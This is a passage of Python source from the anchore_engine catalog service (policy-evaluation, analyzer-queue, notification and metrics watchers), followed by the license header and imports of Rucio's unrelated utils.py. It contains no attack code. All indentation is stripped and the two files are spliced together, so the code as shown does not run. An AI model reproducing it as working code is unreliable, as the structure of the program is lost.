# 'notificationId': str(uuid.uuid4()),
# 'last_eval':last_digests,
# 'curr_eval':new_digests,
# }
# if not simplequeue.is_inqueue(system_user_auth, 'tag_update', inobj):
# qobj = simplequeue.enqueue(system_user_auth, 'tag_update', inobj)
# logger.debug("queued image tag update notification: " + fulltag)
except Exception as err:
logger.error("failed to queue tag update notification - exception: " + str(err))
raise err
except Exception as err:
logger.error("failed to check/update image - exception: " + str(err))
finally:
if event:
with db.session_scope() as dbsession:
catalog_impl.add_event(event, dbsession)
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return True
def check_feedmeta_update(dbsession):
global feed_sync_updated
return feed_sync_updated
def check_policybundle_update(userId, dbsession):
global bundle_user_last_updated
is_updated = True
try:
last_bundle_update = 0
active_policy_record = db_policybundle.get_active_policy(userId, session=dbsession)
if active_policy_record:
last_bundle_update = active_policy_record['last_updated']
else:
logger.warn("user has no active policy - queueing just in case" + str(userId))
return is_updated
if userId not in bundle_user_last_updated:
bundle_user_last_updated[userId] = last_bundle_update
if last_bundle_update == bundle_user_last_updated[userId]:
logger.debug("no bundle update detected since last cycle")
is_updated = False
else:
logger.debug("bundle update detected since last cycle")
bundle_user_last_updated[userId] = last_bundle_update
is_updated = True
except Exception as err:
logger.warn("failed to get/parse active policy bundle for user (" + str(userId) + ") - exception: " + str(err))
bundle_user_last_updated[userId] = 0
is_updated = True
return is_updated
def handle_policyeval(*args, **kwargs):
global system_user_auth, bundle_user_is_updated, feed_sync_updated
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
try:
all_ready = anchore_engine.clients.services.common.check_services_ready(['policy_engine', 'simplequeue'])
if not all_ready:
logger.debug("FIRING DONE: policy eval (skipping due to required services not being available)")
try:
kwargs['mythread']['last_return'] = False
except:
pass
return True
with db.session_scope() as dbsession:
feed_updated = check_feedmeta_update(dbsession)
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
for account in accounts:
userId = account['name']
# policy evaluations
doperform = False
policy_subs = []
for subscription_type in ['policy_eval']:
dbfilter = {'subscription_type': subscription_type}
with db.session_scope() as dbsession:
subscription_records = db_subscriptions.get_byfilter(userId, session=dbsession, **dbfilter)
for subscription_record in subscription_records:
if subscription_record['active']:
image_info = anchore_engine.common.images.get_image_info(userId, "docker", subscription_record[
'subscription_key'], registry_lookup=False, registry_creds=(None, None))
dbfilter = {'registry': image_info['registry'], 'repo': image_info['repo'],
'tag': image_info['tag']}
if (dbfilter, subscription_record['subscription_value']) not in policy_subs:
policy_subs.append((dbfilter, subscription_record['subscription_value']))
for (dbfilter, value) in policy_subs:
with db.session_scope() as dbsession:
image_records = db_catalog_image.get_byimagefilter(userId, 'docker', dbfilter=dbfilter,
onlylatest=False, session=dbsession)
if value:
try:
subscription_value = json.loads(value)
digests = set(subscription_value['digests'])
except Exception as err:
digests = set()
else:
digests = set()
# always add latest version of the image
if len(image_records) > 0:
digests.add(image_records[0]['imageDigest'])
for image_record in image_records:
if image_record['analysis_status'] == taskstate.complete_state('analyze'):
imageDigest = image_record['imageDigest']
if imageDigest not in digests:
continue
fulltag = dbfilter['registry'] + "/" + dbfilter['repo'] + ":" + dbfilter['tag']
# TODO - checks to avoid performing eval if nothing has changed
doperform = True
if doperform:
logger.debug("calling policy eval perform: " + str(fulltag) + " : " + str(imageDigest))
with db.session_scope() as dbsession:
try:
rc = catalog_impl.perform_policy_evaluation(userId, imageDigest, dbsession,
evaltag=fulltag)
except Exception as err:
logger.warn("policy evaluation failed - exception: " + str(err))
except Exception as err:
logger.warn("failure in policy eval / vuln scan handler - exception: " + str(err))
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return True
def handle_analyzer_queue(*args, **kwargs):
global system_user_auth
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
localconfig = anchore_engine.configuration.localconfig.get_config()
obj_mgr = object_store.get_manager()
max_working_time = 36000
try:
max_working_time = int(localconfig['image_analyze_timeout_seconds'])
except:
max_working_time = 36000
fair_share_enabled = True
try:
if str(localconfig.get('services', {}).get('catalog', {}).get('fair_share_image_analysis_queueing', 'True')).lower() == 'false':
fair_share_enabled = False
except:
fair_share_enabled = True
all_ready = anchore_engine.clients.services.common.check_services_ready(['policy_engine', 'simplequeue'])
if not all_ready:
logger.debug("FIRING DONE: analyzer queuer (skipping due to required services not being available)")
try:
kwargs['mythread']['last_return'] = False
except:
pass
return True
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(include_service=False)
q_client = internal_client_for(SimpleQueueClient, userId=None)
queue_rebalance = {}
highest_neg_queueId = -1 * (1024 * 1000) # choose a high value in the negative space as a starting point - this needs to be a value that fits when stored as 'big integer' SQL type
for account in accounts:
userId = account['name']
if account['type'] == AccountTypes.service:
continue
if userId not in queue_rebalance:
queue_rebalance[userId] = {}
# do this in passes, for each analysis_status state
with db.session_scope() as dbsession:
dbfilter = {'analysis_status': taskstate.working_state('analyze')}
workingstate_image_records = db_catalog_image.get_byfilter(userId, session=dbsession, **dbfilter)
# first, evaluate images looking for those that have been in working state for too long and reset
for image_record in workingstate_image_records:
imageDigest = image_record['imageDigest']
if image_record['image_status'] == taskstate.complete_state('image_status'):
state_time = int(time.time()) - image_record['last_updated']
logger.debug("image in working state for (" + str(state_time) + ")s - " + str(imageDigest))
if state_time > max_working_time:
logger.warn("image has been in working state (" + str(
taskstate.working_state('analyze')) + ") for over (" + str(
max_working_time) + ") seconds - resetting and requeueing for analysis")
image_record['analysis_status'] = taskstate.reset_state('analyze')
with db.session_scope() as dbsession:
db_catalog_image.update_record(image_record, session=dbsession)
# next, look for any image in base state (not_analyzed) for queuing
with db.session_scope() as dbsession:
dbfilter = {'analysis_status': taskstate.base_state('analyze')}
basestate_image_records = db_catalog_image.get_byfilter(userId, session=dbsession, **dbfilter)
for basestate_image_record in basestate_image_records:
imageDigest = basestate_image_record['imageDigest']
image_record = basestate_image_record
if image_record['image_status'] == taskstate.complete_state('image_status'):
logger.debug("image check")
if image_record['analysis_status'] == taskstate.base_state('analyze'):
logger.debug("image in base state - " + str(imageDigest))
try:
manifest = obj_mgr.get_document(userId, 'manifest_data', image_record['imageDigest'])
except Exception as err:
logger.debug("failed to get manifest - {}".format(str(err)))
manifest = {}
try:
parent_manifest = obj_mgr.get_document(userId, 'parent_manifest_data', image_record['imageDigest'])
except Exception as err:
parent_manifest = {}
qobj = {}
qobj['userId'] = userId
qobj['imageDigest'] = image_record['imageDigest']
qobj['manifest'] = manifest
qobj['parent_manifest'] = parent_manifest
try:
q_record = q_client.is_inqueue('images_to_analyze', qobj)
if not q_record:
# queue image for analysis
priority = False
logger.debug("queued image for analysis (priority={}): {}".format(priority, str(imageDigest)))
qobj = q_client.enqueue('images_to_analyze', qobj, forcefirst=priority)
else:
logger.debug("image already queued")
# track and store the account's lowest queueId in the task queue, as well as the global highest negative space queueId across all accounts
try:
lowest_queueId = queue_rebalance[userId].get('lowest_queueId', None)
if not lowest_queueId or q_record.get('queueId') < lowest_queueId:
queue_rebalance[userId]['lowest_queueId'] = q_record.get('queueId')
if q_record.get('queueId') < 0 and q_record.get('queueId') >= highest_neg_queueId:
highest_neg_queueId = q_record.get('queueId')
except Exception as err:
logger.error("failed to store image current queueID - excpetion: {}".format(err))
except Exception as err:
logger.error("failed to check/queue image for analysis - exception: " + str(err))
# promote queued tasks into the analysis queue such that one image from each account is prioritized, to implement a simple 'fair share' across accounts
if fair_share_enabled:
try:
queue_id_updates = _perform_queue_rebalance(queue_rebalance, highest_neg_queueId)
for src,dst in queue_id_updates:
q_client.update_queueid('images_to_analyze', src_queueId=src, dst_queueId=dst)
except:
logger.exception('Ignoring errors rebalancing analysis queue')
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return True
def _perform_queue_rebalance(queue_rebalance, highest_neg_queueId):
ret = []
for userId in queue_rebalance.keys():
user_lowest_queueId = queue_rebalance[userId].get('lowest_queueId', None)
if user_lowest_queueId and user_lowest_queueId > 0:
# shuffle the task into neg space
highest_neg_queueId += 1
if highest_neg_queueId <= -1:
logger.spew("prioritizing user {} image in image analysis queue for fair-share (queueId={}, new_queueId={})".format(userId, user_lowest_queueId, highest_neg_queueId))
ret.append( (user_lowest_queueId, highest_neg_queueId) )
return ret
def handle_notifications(*args, **kwargs):
global system_user_auth
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
q_client = internal_client_for(SimpleQueueClient, userId=None)
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
localconfig = anchore_engine.configuration.localconfig.get_config()
try:
notification_timeout = int(localconfig['webhooks']['notification_retry_timeout'])
except:
notification_timeout = 30
logger.debug("notification timeout: " + str(notification_timeout))
# get the event log notification config
try:
event_log_config = localconfig.get('services', {}).get('catalog', {}).get('event_log', None)
if event_log_config and 'notification' in event_log_config:
notify_events = event_log_config.get('notification').get('enabled', False)
if notify_events and 'level' in event_log_config.get('notification'):
event_levels = event_log_config.get('notification').get('level')
event_levels = [level.lower() for level in event_levels]
else:
event_levels = None
else:
notify_events = False
event_levels = None
except:
logger.exception('Ignoring errors parsing for event_log configuration')
notify_events = False
event_levels = None
# regular event queue notifications + event log notification
event_log_type = 'event_log'
for subscription_type in anchore_engine.common.subscription_types + [event_log_type]:
logger.debug("notifier: " + subscription_type)
accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
try:
qlen = q_client.qlen(subscription_type)
except Exception as err:
logger.debug(
"problem looking for notifications in queue: " + str(subscription_type) + " - exception: " + str(
err))
qlen = 0
while qlen > 0:
pupdate_record = q_client.dequeue(subscription_type)
if pupdate_record:
logger.debug("got notification from queue: " + json.dumps(pupdate_record, indent=4))
notification = pupdate_record['data']
userId = notification['userId']
subscription_key = notification['subscription_key']
notificationId = notification['notificationId']
for account in accounts:
try:
if userId == account['name']:
notification_record = None
# new handling
subscription_type_actual = subscription_type
if notification.get('event', {}).get('details', {}).get('subscription_type', None) in anchore_engine.common.subscription_types:
subscription_type_actual = notification.get('event', {}).get('details', {}).get('subscription_type')
subscription_key_actual = notification.get('event', {}).get('resource', {}).get('id')
dbfilter = {
'subscription_type': subscription_type_actual,
'subscription_key': subscription_key_actual,
}
subscription_records = db_subscriptions.get_byfilter(account['name'],
session=dbsession, **dbfilter)
if subscription_records:
subscription = subscription_records[0]
if subscription and subscription['active']:
notification_transform = {
'notificationId': notification.get('notificationId'),
'userId': notification.get('userId'),
'subscription_key': subscription_key_actual,
}
notification_transform.update(notification.get('event', {}).get('details', {}))
notification_record = notifications.make_notification(account,
subscription_type_actual,
notification_transform)
else:
if notify_events and (
event_levels is None or subscription_key.lower() in event_levels):
notification.pop('subscription_key',
None) # remove subscription_key property from notification
notification_record = notifications.make_notification(account, subscription_type,
notification)
if notification_record:
logger.spew("Storing NOTIFICATION: {} - {} - {}".format(account, notification_record, subscription_type))
db_queues.add(subscription_type_actual, userId, notificationId, notification_record, 0,
int(time.time() + notification_timeout), session=dbsession)
except Exception as err:
import traceback
traceback.print_exc()
logger.warn("cannot store notification to DB - exception: " + str(err))
qlen = q_client.qlen(subscription_type)
for account in accounts:
notification_records = db_queues.get_all(subscription_type, account['name'], session=dbsession)
for notification_record in notification_records:
logger.spew("drained to send: " + json.dumps(notification_record))
try:
rc = notifications.notify(account, notification_record)
if rc:
db_queues.delete_record(notification_record, session=dbsession)
except Exception as err:
logger.debug("failed to send notification, storing for retry - exception: " + str(err))
notification_record['tries'] = int(time.time())
if notification_record['tries'] > notification_record['max_tries']:
logger.error("hit max notification timeout: dropping notificaion")
db_queues.delete_record(notification_record, session=dbsession)
else:
db_queues.update_record(notification_record, session=dbsession)
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return True
def handle_metrics(*args, **kwargs):
cycle_timer = kwargs['mythread']['cycle_timer']
while True:
# perform some DB read/writes for metrics gathering
if anchore_engine.subsys.metrics.is_enabled():
# DB probes
anchore_record = None
try:
with anchore_engine.subsys.metrics.get_summary_obj("anchore_db_read_seconds").time() as mtimer:
with db.session_scope() as dbsession:
anchore_record = db_anchore.get(session=dbsession)
except Exception as err:
logger.warn("unable to perform DB read probe - exception: " + str(err))
if anchore_record:
try:
with anchore_engine.subsys.metrics.get_summary_obj("anchore_db_write_seconds").time() as mtimer:
with db.session_scope() as dbsession:
anchore_record['record_state_val'] = str(time.time())
rc = db_anchore.update_record(anchore_record, session=dbsession)
except Exception as err:
logger.warn("unable to perform DB write probe - exception: " + str(err))
try:
with anchore_engine.subsys.metrics.get_summary_obj("anchore_db_readwrite_seconds").time() as mtimer:
with db.session_scope() as dbsession:
anchore_record = db_anchore.get(session=dbsession)
anchore_record['record_state_val'] = str(time.time())
rc = db_anchore.update_record(anchore_record, session=dbsession)
except Exception as err:
logger.warn("unable to perform DB read/write probe - exception: " + str(err))
# FS probes
localconfig = anchore_engine.configuration.localconfig.get_config()
try:
tmpdir = localconfig['tmp_dir']
svfs = os.statvfs(tmpdir)
available_bytes = svfs.f_bsize * svfs.f_bavail
anchore_engine.subsys.metrics.gauge_set("anchore_tmpspace_available_bytes", available_bytes)
except Exception as err:
logger.warn("unable to detect available bytes probe - exception: " + str(err))
time.sleep(cycle_timer)
def handle_archive_tasks(*args, **kwargs):
"""
Handles periodic scan tasks for archive rule processing
:param args:
:param kwargs:
:return:
"""
watcher = str(kwargs['mythread']['taskType'])
start_time = time.time()
logger.debug("FIRING: " + str(watcher))
task_id = None
account_names = []
try:
logger.info('Starting analysis archive transition rule processor')
with db.session_scope() as session:
# Get all enabled accounts
mgr = manager_factory.for_session(session)
accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
if accounts:
account_names = [x['name'] for x in accounts]
logger.debug('Found accounts {} with transition rules'.format(accounts))
for account in account_names:
task = archiver.ArchiveTransitionTask(account)
task_id = task.task_id
logger.info('Starting archive transition task {} for account {}'.format(task.task_id, account))
task.run()
logger.info('Archive transition task {} complete'.format(task.task_id))
except Exception:
logger.exception('Caught unexpected exception')
finally:
logger.debug('Analysis archive task {} execution time: {} seconds'.format(task_id, time.time() - start_time))
logger.debug('Sleeping until next cycle since no messages to process')
return True
click = 0
running = False
last_run = 0
system_user_auth = ('anchore-system', '')
# policy update check data
feed_sync_updated = False
bundle_user_last_updated = {}
bundle_user_is_updated = {}
default_lease_ttl = 60 # 1 hour ttl, should be more than enough in most cases
def watcher_func(*args, **kwargs):
global system_user_auth
while True:
logger.debug("starting generic watcher")
all_ready = anchore_engine.clients.services.common.check_services_ready(['simplequeue'])
if not all_ready:
logger.info("simplequeue service not yet ready, will retry")
else:
q_client = internal_client_for(SimpleQueueClient, userId=None)
lease_id = None
try:
logger.debug("attempting dequeue")
qobj = q_client.dequeue('watcher_tasks', max_wait_seconds=30)
logger.debug("dequeue complete")
if qobj:
logger.debug("got task from queue: " + str(qobj))
watcher = qobj['data']['watcher']
handler = watchers[watcher]['handler']
args = []
kwargs = {'mythread': watchers[watcher]}
lease_id = watchers[watcher]['task_lease_id']
# Old way
timer = time.time()
if not lease_id:
logger.debug(
'No task lease defined for watcher {}, initiating without lock protection'.format(watcher))
rc = handler(*args, **kwargs)
else:
rc = simplequeue.run_target_with_lease(None, lease_id, handler,
ttl=default_lease_ttl, *args, **kwargs)
else:
logger.debug("nothing in queue")
except (simplequeue.LeaseAcquisitionFailedError, simplequeue.LeaseUnavailableError) as e:
logger.debug('Lease acquisition could not complete, but this is probably due to another process with the lease: {}'.format(e))
except Exception as err:
logger.warn("failed to process task this cycle: " + str(err))
logger.debug("generic watcher done")
time.sleep(5)
def schedule_watcher(watcher):
global watchers, watcher_task_template, system_user_auth
if watcher not in watchers:
logger.warn("input watcher {} not in list of available watchers {}".format(watcher, list(watchers.keys())))
return False
if watchers[watcher]['taskType']:
logger.debug("should queue job: " + watcher)
watcher_task = copy.deepcopy(watcher_task_template)
watcher_task['watcher'] = watcher
watcher_task['taskType'] = watchers[watcher]['taskType']
try:
q_client = internal_client_for(SimpleQueueClient, userId=None)
if not q_client.is_inqueue('watcher_tasks', watcher_task):
qobj = q_client.enqueue('watcher_tasks', watcher_task)
logger.debug(str(watcher_task) + ": init task queued: " + str(qobj))
else:
logger.debug(str(watcher_task) + ": init task already queued")
watchers[watcher]['last_queued'] = time.time()
except Exception as err:
logger.warn("failed to enqueue watcher task: " + str(err))
return True
def monitor_func(**kwargs):
global click, running, last_queued, system_user_auth, watchers, last_run
if click < 5:
click = click + 1
logger.debug("Catalog monitor starting in: " + str(5 - click))
return True
if running or ((time.time() - last_run) < kwargs['kick_timer']):
return True
logger.debug("FIRING: catalog_monitor")
try:
localconfig = anchore_engine.configuration.localconfig.get_config()
system_user_auth = localconfig['system_user_auth']
for watcher in list(watchers.keys()):
if not watchers[watcher]['initialized']:
# first time
if 'cycle_timers' in kwargs and watcher in kwargs['cycle_timers']:
try:
the_cycle_timer = watchers[watcher]['cycle_timer']
min_cycle_timer = watchers[watcher]['min_cycle_timer']
max_cycle_timer = watchers[watcher]['max_cycle_timer']
config_cycle_timer = int(kwargs['cycle_timers'][watcher])
if config_cycle_timer < 0:
the_cycle_timer = abs(int(config_cycle_timer))
elif config_cycle_timer == 0:
watchers[watcher]['enabled'] = False
logger.debug("watcher '{}' has been explicitly disabled in config".format(watcher))
elif config_cycle_timer < min_cycle_timer:
logger.warn("configured cycle timer for handler (" + str(
watcher) + ") is less than the allowed min (" + str(
min_cycle_timer) + ") - using allowed min")
the_cycle_timer = min_cycle_timer
elif config_cycle_timer > max_cycle_timer:
logger.warn("configured cycle timer for handler (" + str(
watcher) + ") is greater than the allowed max (" + str(
max_cycle_timer) + ") - using allowed max")
the_cycle_timer = max_cycle_timer
else:
the_cycle_timer = config_cycle_timer
watchers[watcher]['cycle_timer'] = the_cycle_timer
except Exception as err:
logger.warn(
"exception setting custom cycle timer for handler (" + str(watcher) + ") - using default")
watchers[watcher]['initialized'] = True
if watchers[watcher].get('enabled', True):
if watcher not in watcher_threads:
if watchers[watcher]['taskType']:
# spin up a generic task watcher
logger.debug("starting generic task thread")
watcher_threads[watcher] = threading.Thread(target=watcher_func, args=[watcher], kwargs={})
watcher_threads[watcher].start()
else:
# spin up a specific looping watcher thread
watcher_threads[watcher] = threading.Thread(target=watchers[watcher]['handler'],
args=watchers[watcher]['args'],
kwargs={'mythread': watchers[watcher]})
watcher_threads[watcher].start()
all_ready = anchore_engine.clients.services.common.check_services_ready(['simplequeue'])
if not all_ready:
logger.info("simplequeue service not yet ready, will retry")
elif time.time() - watchers[watcher]['last_queued'] > watchers[watcher]['cycle_timer']:
rc = schedule_watcher(watcher)
except Exception as err:
logger.error(str(err))
finally:
logger.debug("FIRING DONE: catalog_monitor")
running = False
last_run = time.time()
logger.debug("exiting monitor thread")
monitor_thread = None
def monitor(*args, **kwargs):
global monitor_thread
try:
donew = False
if monitor_thread:
if monitor_thread.isAlive():
logger.spew("MON: thread still running")
else:
logger.spew("MON: thread stopped running")
donew = True
monitor_thread.join()
logger.spew("MON: thread joined: isAlive=" + str(monitor_thread.isAlive()))
else:
logger.spew("MON: no thread")
donew = True
if donew:
logger.spew("MON: starting")
monitor_thread = threading.Thread(target=monitor_func, kwargs=kwargs)
monitor_thread.start()
else:
logger.spew("MON: skipping")
except Exception as err:
logger.warn("MON thread start exception: " + str(err))
class CatalogService(ApiService):
__service_name__ = 'catalog'
__spec_dir__ = pkg_resources.resource_filename(__name__, 'swagger')
__monitor_fn__ = monitor
def _register_instance_handlers(self):
super()._register_instance_handlers()
self.register_handler(LifeCycleStages.post_db, self._init_object_storage, {})
self.register_handler(LifeCycleStages.post_register, self._init_policies, {})
def _init_object_storage(self):
try:
did_init = object_store.initialize(self.configuration, manager_id=DEFAULT_OBJECT_STORE_MANAGER_ID, config_keys=[DEFAULT_OBJECT_STORE_MANAGER_ID, ALT_OBJECT_STORE_CONFIG_KEY], allow_legacy_fallback=True)
if not did_init:
logger.warn('Unexpectedly found the object store already initialized. This is not an expected condition. Continuting with driver: {}'.format(object_store.get_manager().primary_client.__config_name__))
except Exception as err:
logger.exception("Error initializing the object store: check catalog configuration")
raise err
try:
archive.initialize(self.configuration)
except Exception as err:
logger.exception("Error initializing analysis archive: check catalog configuration")
raise err
def _init_policies(self):
"""
Ensure all accounts have a default policy in place
:return:
"""
obj_mgr = object_store.get_manager()
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
for account_dict in mgr.list_accounts(include_service=False):
try:
logger.info('Initializing a new account')
userId = account_dict['name'] # Old keys are userId, now that maps to account name
bundle_records = db_policybundle.get_all_byuserId(userId, session=dbsession)
if not bundle_records:
logger.debug("Account {} has no policy bundle - installing default".format(userId))
config = self.global_configuration
if config.get('default_bundle_file', None) and os.path.exists(config['default_bundle_file']):
logger.info("loading def bundle: " + str(config['default_bundle_file']))
try:
default_bundle = {}
with open(config['default_bundle_file'], 'r') as FH:
default_bundle = json.loads(FH.read())
if default_bundle:
bundle_url = obj_mgr.put_document(userId, 'policy_bundles', default_bundle['id'],
default_bundle)
policy_record = make_policy_record(userId, default_bundle, active=True)
rc = db_policybundle.add(policy_record['policyId'], userId, True, policy_record,
session=dbsession)
if not rc:
raise Exception("policy bundle DB add failed")
except Exception as err:
if isinstance(err, IntegrityError):
logger.warn("another process has already initialized, continuing")
else:
logger.error("could not load up default bundle for user - exception: " + str(err))
except Exception as err:
if isinstance(err, IntegrityError):
logger.warn("another process has already initialized, continuing")
else:
raise Exception("unable to initialize default user data - exception: " + str(err))
watchers = {
'image_watcher': {'handler': handle_image_watcher, 'task_lease_id': 'image_watcher',
'taskType': 'handle_image_watcher', 'args': [], 'cycle_timer': 600, 'min_cycle_timer': 300,
'max_cycle_timer': 86400 * 7, 'last_queued': 0, 'last_return': False, 'initialized': False},
'repo_watcher': {'handler': handle_repo_watcher, 'task_lease_id': 'repo_watcher', 'taskType': 'handle_repo_watcher',
'args': [], 'cycle_timer': 60, 'min_cycle_timer': 60, 'max_cycle_timer': 86400 * 7,
'last_queued': 0, 'last_return': False, 'initialized': False},
'policy_eval': {'handler': handle_policyeval, 'task_lease_id': 'policy_eval', 'taskType': 'handle_policyeval',
'args': [], 'cycle_timer': 300, 'min_cycle_timer': 60, 'max_cycle_timer': 86400 * 2,
'last_queued': 0, 'last_return': False, 'initialized': False},
'analyzer_queue': {'handler': handle_analyzer_queue, 'task_lease_id': 'analyzer_queue',
'taskType': 'handle_analyzer_queue', 'args': [], 'cycle_timer': 5, 'min_cycle_timer': 1,
'max_cycle_timer': 7200, 'last_queued': 0, 'last_return': False, 'initialized': False},
'notifications': {'handler': handle_notifications, 'task_lease_id': 'notifications',
'taskType': 'handle_notifications', 'args': [], 'cycle_timer': 10, 'min_cycle_timer': 10,
'max_cycle_timer': 86400 * 2, 'last_queued': 0, 'last_return': False, 'initialized': False},
'vulnerability_scan': {'handler': handle_vulnerability_scan, 'task_lease_id': 'vulnerability_scan',
'taskType': 'handle_vulnerability_scan', 'args': [], 'cycle_timer': 300,
'min_cycle_timer': 60, 'max_cycle_timer': 86400 * 2, 'last_queued': 0, 'last_return': False,
'initialized': False},
'account_resource_cleanup': {'handler': handle_account_resource_cleanup, 'task_lease_id': 'account_resource_cleanup',
'taskType': 'handle_account_resource_cleanup', 'args': [], 'cycle_timer': 30,
'min_cycle_timer': 30, 'max_cycle_timer': 30, 'last_queued': 0, 'last_return': False,
'initialized': False},
'service_watcher': {'handler': handle_service_watcher, 'task_lease_id': False, 'taskType': None, 'args': [],
'cycle_timer': 10, 'min_cycle_timer': 1, 'max_cycle_timer': 300, 'last_queued': 0,
'last_return': False, 'initialized': False},
'service_heartbeat': {'handler': anchore_engine.subsys.servicestatus.handle_service_heartbeat,
'task_lease_id': False, 'taskType': None, 'args': [CatalogService.__service_name__],
'cycle_timer': 60, 'min_cycle_timer': 60, 'max_cycle_timer': 60, 'last_queued': 0,
'last_return': False, 'initialized': False},
'handle_metrics': {'handler': handle_metrics, 'task_lease_id': False, 'taskType': None, 'args': [],
'cycle_timer': 60, 'min_cycle_timer': 60, 'max_cycle_timer': 60, 'last_queued': 0,
'last_return': False, 'initialized': False},
'archive_tasks': {'handler': handle_archive_tasks, 'task_lease_id': 'archive_transitions', 'taskType': 'handle_archive_tasks', 'args': [], 'cycle_timer': 43200,
'min_cycle_timer': 60, 'max_cycle_timer': 86400 * 5, 'last_queued': 0, 'last_return': False,
'initialized': False},
}
watcher_task_template = {
'taskType': None,
'watcher': None,
}
watcher_threads = {}
|
utils.py
|
# -*- coding: utf-8 -*-
# Copyright 2012-2022 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vincent Garonne <vincent.garonne@cern.ch>, 2012-2018
# - Thomas Beermann <thomas.beermann@cern.ch>, 2012-2021
# - Mario Lassnig <mario.lassnig@cern.ch>, 2012-2021
# - Cedric Serfon <cedric.serfon@cern.ch>, 2013-2022
# - Ralph Vigne <ralph.vigne@cern.ch>, 2013
# - Joaquín Bogado <jbogado@linti.unlp.edu.ar>, 2015-2018
# - Martin Barisits <martin.barisits@cern.ch>, 2016-2022
# - Brian Bockelman <bbockelm@cse.unl.edu>, 2018
# - Tobias Wegner <twegner@cern.ch>, 2018-2019
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Tomas Javurek <tomas.javurek@cern.ch>, 2019-2020
# - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019
# - James Perry <j.perry@epcc.ed.ac.uk>, 2019-2021
# - Gabriele Fronze' <gfronze@cern.ch>, 2019
# - Jaroslav Guenther <jaroslav.guenther@cern.ch>, 2019-2020
# - Eli Chadwick <eli.chadwick@stfc.ac.uk>, 2020
# - Patrick Austin <patrick.austin@stfc.ac.uk>, 2020
# - root <root@escape-rucio-dev-oidc-r.cern.ch>, 2020
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020-2021
# - Mayank Sharma <mayank.sharma@cern.ch>, 2021
# - Rahul Chauhan <omrahulchauhan@gmail.com>, 2021
# - Radu Carpa <radu.carpa@cern.ch>, 2021-2022
# - Anil Panta <47672624+panta-123@users.noreply.github.com>, 2021
# - Ilija Vukotic <ivukotic@cern.ch>, 2021
# - David Población Criado <david.poblacion.criado@cern.ch>, 2021
# - martynia <janusz.martyniak@googlemail.com>, 2021-2022
# - jdierkes <joel.dierkes@cern.ch>, 2021
# - Rakshita Varadarajan <rakshitajps@gmail.com>, 2021
# - Rob Barnsley <robbarnsley@users.noreply.github.com>, 2021
# - Igor Mandrichenko <ivm@fnal.gov>, 2021
# - Joel Dierkes <joel.dierkes@cern.ch>, 2021
from __future__ import absolute_import, print_function
import argparse
import base64
import datetime
import errno
import getpass
import hashlib
import io
import itertools
import json
import logging
import mmap
import os
import os.path
import re
import socket
import subprocess
import tempfile
import threading
import time
import zlib
from collections import OrderedDict
from enum import Enum
from functools import partial
from uuid import uuid4 as uuid
from xml.etree import ElementTree
import requests
from six import string_types, text_type, binary_type, ensure_text, PY3
from six.moves import StringIO, zip_longest as izip_longest
from six.moves.urllib.parse import urlparse, urlencode, quote, parse_qsl, urlunparse
from six.moves.configparser import NoOptionError, NoSectionError
from rucio.common.config import config_get, config_has_section
from rucio.common.exception import MissingModuleException, InvalidType, InputValidationError, MetalinkJsonParsingError, RucioException, \
DuplicateCriteriaInDIDFilter, DIDFilterSyntaxError, InvalidAlgorithmName
from rucio.common.extra import import_extras
from rucio.common.types import InternalAccount, InternalScope
EXTRA_MODULES = import_extras(['paramiko'])
if EXTRA_MODULES['paramiko']:
try:
from paramiko import RSAKey
except Exception:
EXTRA_MODULES['paramiko'] = False
# HTTP code dictionary. Not complete. Can be extended if needed.
codes = {
# Informational.
200: '200 OK',
201: '201 Created',
202: '202 Accepted',
# Client Error.
400: '400 Bad Request',
401: '401 Unauthorized',
403: '403 Forbidden',
404: '404 Not Found',
405: '405 Method Not Allowed',
